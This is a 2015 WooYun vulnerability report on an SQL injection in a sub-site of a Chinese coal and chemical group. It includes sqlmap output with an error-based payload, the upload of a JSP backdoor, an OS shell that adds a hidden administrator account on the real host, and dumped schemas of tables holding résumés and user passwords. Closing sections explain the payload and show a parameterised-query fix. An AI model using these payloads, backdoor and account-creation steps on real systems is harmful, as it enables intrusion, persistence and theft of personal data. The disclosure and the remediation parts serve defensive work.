WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader ---------------- http://drop.zone.ci/
2015-08-21: Details sent to the vendor, awaiting the vendor's response
2015-08-24: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible organisation; details disclosed only to the notifying agency
2015-09-03: Details disclosed to core white hats and experts in the relevant field
2015-09-13: Details disclosed to regular white hats
2015-09-23: Details disclosed to intern white hats
2015-10-08: Details disclosed to the public

A sub-site of Shaanxi Coal and Chemical Industry Group (a Fortune Global 500 company) has a SQL injection vulnerability that exposes a large amount of information. The application is JSP, the database connection runs as root, and privilege escalation to the host is possible directly.
Vulnerable page: http://**.**.**.**/web/yjy?id=38
[20:06:19] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:06:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 161 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=38 AND (SELECT 2021 FROM(SELECT COUNT(*),CONCAT(0x71676d6571,(SELECT (CASE WHEN (2021=2021) THEN 1 ELSE 0 END)),0x7176696b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[20:07:43] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[20:07:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'
[*] shutting down at 20:07:43
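The payload above is sqlmap's MySQL duplicate-key trick: the GROUP BY over CONCAT(marker, value, marker, FLOOR(RAND(0)*2)) makes MySQL build the same group key twice, and the resulting "Duplicate entry '...' for key 'group_key'" error echoes the key, with the injected subquery's result sitting between the two hex markers. The following Python is an added illustration of that mechanism, not code from the report or from sqlmap: it decodes the two marker literals used on this page, pulls the leaked value out of a constructed error message, and shows how the same payload shape carries an arbitrary inner SELECT. The error string and the `build_payload` helper are assumptions for illustration; nothing is sent anywhere.

```python
import re
from typing import Optional

# Constructed (not from the report) MySQL error of the kind the vulnerable
# page returns once the duplicate-key trick fires. The key is
# prefix + leaked value + suffix + FLOOR(RAND(0)*2), and RAND(0) is
# deterministic, so the colliding key always ends in 1.
SAMPLE_ERROR = (
    "java.sql.SQLException: Duplicate entry 'qgmeq1qvikq1' for key 'group_key'"
)

# Hex markers exactly as they appear in the sqlmap payload on this page.
PREFIX_HEX = "0x71676d6571"
SUFFIX_HEX = "0x7176696b71"


def decode_marker(hex_literal: str) -> str:
    """Convert a MySQL 0x... literal (as used inside CONCAT) to its ASCII text."""
    h = hex_literal.lower()
    if h.startswith("0x"):
        h = h[2:]
    return bytes.fromhex(h).decode("ascii")


def extract_leaked_value(error_text: str, prefix_hex: str = PREFIX_HEX,
                         suffix_hex: str = SUFFIX_HEX) -> Optional[str]:
    """Return the text between the two markers in a duplicate-entry error,
    or None when the error does not carry the markers."""
    prefix = decode_marker(prefix_hex)
    suffix = decode_marker(suffix_hex)
    pattern = re.escape(prefix) + r"(.*?)" + re.escape(suffix)
    m = re.search(pattern, error_text, re.DOTALL)
    return m.group(1) if m else None


def build_payload(inner_query: str, prefix_hex: str = PREFIX_HEX,
                  suffix_hex: str = SUFFIX_HEX) -> str:
    """Assumed helper: reproduce the shape of the page's payload with an
    arbitrary inner SELECT, to show where the extracted value lands.
    It only builds a string."""
    return (
        "38 AND (SELECT 2021 FROM(SELECT COUNT(*),CONCAT("
        f"{prefix_hex},({inner_query}),{suffix_hex},FLOOR(RAND(0)*2))x "
        "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
    )


if __name__ == "__main__":
    print("markers:", decode_marker(PREFIX_HEX), decode_marker(SUFFIX_HEX))
    print("leaked:", extract_leaked_value(SAMPLE_ERROR))
    print(build_payload("SELECT USER()"))
```

The markers are random per sqlmap run; what matters for a defender is that the application returned the raw JDBC exception text to the client, which is what turns a blind injection into a one-request-per-value data leak.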
[20:07:58] [INFO] fetching current user
[20:07:59] [INFO] retrieved: root@localhost
current user is DBA: True
[20:07:59] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'
do you want to try the same method used for the file stager? [Y/n] y
[20:26:28] [INFO] the backdoor has been successfully uploaded on '/apache-tomcat-7.0.35/webapps/sxccti' - http://**.**.**.**:80/sxccti/tmpbnhay.jsp
[20:26:28] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> net user
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
User accounts for \\WIN-IMDOU5E7KPA
-------------------------------------------------------------------------------
Administrator            Guest
The command completed successfully.
---
os-shell> net user admin$ jiankeabc123 /add
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
The command completed successfully.
---
os-shell> net localgroup administrators admin$ /add
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
The command completed successfully.
---
os-shell> net user
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
User accounts for \\WIN-IMDOU5E7KPA
-------------------------------------------------------------------------------
Administrator            Guest
The command completed successfully.
Database: websf
Table: resume
[26 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| address         | varchar(255) |
| birthday        | varchar(255) |
| census          | varchar(255) |
| college         | varchar(255) |
| component_id    | int(11)      |
| contact         | varchar(255) |
| country         | varchar(255) |
| createTime      | timestamp    |
| degree          | varchar(255) |
| email           | varchar(255) |
| employ_id       | int(11)      |
| finishTime      | varchar(255) |
| foreignLanguage | text         |
| id              | int(11)      |
| jobHistory      | text         |
| marriage        | varchar(255) |
| myself          | text         |
| name            | varchar(255) |
| nation          | varchar(255) |
| party           | varchar(255) |
| sex             | varchar(255) |
| skill           | text         |
| speciality      | varchar(255) |
| studyHistory    | text         |
| updateTime      | timestamp    |
| zipcode         | varchar(255) |
+-----------------+--------------+

Database: websf
Table: employ
[14 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| amount       | varchar(255) |
| component_id | int(11)      |
| createTime   | timestamp    |
| degree       | varchar(255) |
| endTime      | timestamp    |
| id           | int(11)      |
| interfix     | varchar(255) |
| name         | varchar(255) |
| pay          | varchar(255) |
| place        | varchar(255) |
| publishTime  | timestamp    |
| sort         | varchar(255) |
| synopsis     | text         |
| updateTime   | timestamp    |
+--------------+--------------+

Database: websf
Table: user
[9 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| mobile   | varchar(255) |
| org_id   | int(11)      |
| password | varchar(255) |
| phone    | varchar(255) |
| realname | varchar(255) |
| state    | int(11)      |
| station  | varchar(255) |
| username | varchar(255) |
+----------+--------------+
As shown above, I only dumped one database here; there are also the party-school database and others, which already amount to a considerable quantity of information.

Filter user input.
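The suggested fix is to filter the `id` parameter. The following Python example is added here and is not code from the report or from the affected application; it uses an in-memory SQLite table as a stand-in for the MySQL table behind /web/yjy?id=38 (table name, rows and function names are constructed for illustration). It shows the three query styles side by side: the string concatenation the vulnerable page must be doing, a keyword blacklist of the kind "filtering" usually means, and a type check followed by a bound parameter. The blacklist version is included to show why it is not enough: the same payload with `/**/` in place of spaces slips past it.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the page's lookup table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE yjy (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO yjy VALUES (?, ?)",
        [(38, "Research institute profile"), (39, "Another page")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> List[Tuple]:
    """Request parameter concatenated into SQL text, so 'id=38 AND 1=2'
    changes the query instead of being compared as a value."""
    sql = "SELECT id, title FROM yjy WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


# Assumed blacklist; a typical "filter" fix strips a few keywords and
# then still concatenates.
BLACKLIST = (" and ", " or ", "select", "union")


def lookup_filtered(conn: sqlite3.Connection, raw_id: str) -> List[Tuple]:
    """Blacklist filtering. It stops '38 or 1=1' but not
    '38/**/or/**/1=1', because the keyword no longer has spaces around it
    and the SQL parser accepts comments as token separators."""
    cleaned = raw_id.lower()
    for word in BLACKLIST:
        cleaned = cleaned.replace(word, "")
    sql = "SELECT id, title FROM yjy WHERE id=" + cleaned
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, raw_id: str) -> List[Tuple]:
    """Hardened version: enforce the expected type, then bind the value so
    the driver never interpolates it into the SQL text. In the JSP
    application this corresponds to Integer.parseInt plus a
    PreparedStatement with setInt."""
    try:
        page_id = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute(
        "SELECT id, title FROM yjy WHERE id=?", (page_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, benign :", lookup_vulnerable(db, "38"))
    print("vulnerable, OR 1=1 :", lookup_vulnerable(db, "38 OR 1=1"))
    print("filtered, plain    :", lookup_filtered(db, "38 or 1=1"))
    print("filtered, comments :", lookup_filtered(db, "38/**/or/**/1=1"))
    print("safe, benign       :", lookup_safe(db, "38"))
```

Beyond the query itself, the report shows two other conditions that turned this into a host compromise: the application connected to MySQL as root@localhost, and the JDBC exception text was returned to the client. A least-privilege database account with no FILE privilege would have stopped the file stager, and a generic error page would have forced a much slower blind extraction.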
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-08-24 09:50
CNVD has confirmed and reproduced the reported issue and has passed it to CNCERT to notify the information-technology authority for the energy sector, which will coordinate handling with the organisation that operates the website.
Vendor response: none yet